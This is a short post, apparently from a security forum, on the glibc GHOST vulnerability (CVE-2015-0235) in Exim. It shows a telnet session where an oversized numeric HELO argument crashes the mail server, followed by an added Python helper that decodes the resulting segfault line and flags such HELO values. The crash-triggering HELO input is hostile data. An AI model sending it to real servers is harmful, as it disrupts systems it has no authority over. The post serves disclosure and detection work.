CVE-2015-0235: exploits of every kind for GNU glibc are about to emerge

猪猪侠 | 2015-01-28 16:46

The Exim mail server is exploitable remotely if configured to perform extra security checks on the HELO and EHLO commands ("helo_verify_hosts" or "helo_try_verify_hosts" option, or "verify = helo" ACL); we developed a reliable and fully-functional exploit that bypasses all existing protections (ASLR, PIE, NX) on 32-bit and 64-bit machines.

user@...ian-7-7-64b:~$ telnet 127.0.0.1 25
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
220 debian-7-7-64b ESMTP Exim 4.80 ...
HELO 00000000000000000000000000000000000000000000000...
Connection closed by foreign host.
user@...ian-7-7-64b:~$ dmesg
...
[ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in libc-2.13.so[7fabef2a2000+182000]
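Added example, not part of the post or of the Qualys advisory: a small Python helper for the responder side. It decodes the kernel segfault line shown above (instruction offset inside libc-2.13.so, page-fault error bits) and flags HELO/EHLO arguments shaped like the one in the session. The regex, field names and the 256-byte length threshold are my assumptions.

```python
import re

# Constructed sample: the dmesg line quoted in the post above, same values.
SAMPLE_DMESG = (
    "[ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 "
    "sp 00007fffb427d5b0 error 6 in libc-2.13.so[7fabef2a2000+182000]"
)

# Matches the x86 Linux "segfault at ... in module[base+size]" report format.
SEGFAULT_RE = re.compile(
    r"(?P<comm>\S+)\[(?P<pid>\d+)\]: segfault at (?P<addr>[0-9a-f]+) "
    r"ip (?P<ip>[0-9a-f]+) sp (?P<sp>[0-9a-f]+) error (?P<err>\d+) "
    r"in (?P<module>[^\[]+)\[(?P<base>[0-9a-f]+)\+(?P<size>[0-9a-f]+)\]"
)


def parse_segfault(line):
    """Decode one kernel segfault line into a dict, or None if it is not one."""
    m = SEGFAULT_RE.search(line)
    if not m:
        return None
    base, size = int(m["base"], 16), int(m["size"], 16)
    ip, addr, err = int(m["ip"], 16), int(m["addr"], 16), int(m["err"])
    in_module = lambda a: base <= a < base + size
    return {
        "comm": m["comm"],
        "pid": int(m["pid"]),
        "module": m["module"],
        # Offset of the faulting instruction inside the mapped module: this is
        # the value to look up with addr2line/objdump on the same libc build.
        "ip_offset": ip - base if in_module(ip) else None,
        # x86 page-fault error code: bit0 = protection violation (else page not
        # present), bit1 = write access (else read), bit2 = fault in user mode.
        "protection_violation": bool(err & 1),
        "write": bool(err & 2),
        "user_mode": bool(err & 4),
        # A write to an address outside the code module points at data (heap)
        # being corrupted rather than a wild jump into libc itself.
        "fault_addr_in_module": in_module(addr),
    }


def looks_like_ghost_helo(helo_arg, max_len=255):
    """Flag a HELO/EHLO argument shaped like the trigger in the post: a string
    made only of digits and dots that is longer than any legal host name.
    Assumption: RFC 5321 caps a domain at 255 octets, so longer is anomalous."""
    return len(helo_arg) > max_len and all(c in "0123456789." for c in helo_arg)
```

A mail gateway or log pipeline can run `looks_like_ghost_helo` on the HELO argument before it ever reaches the verification lookup, and `parse_segfault` over dmesg to correlate crashes of the Exim worker with such sessions.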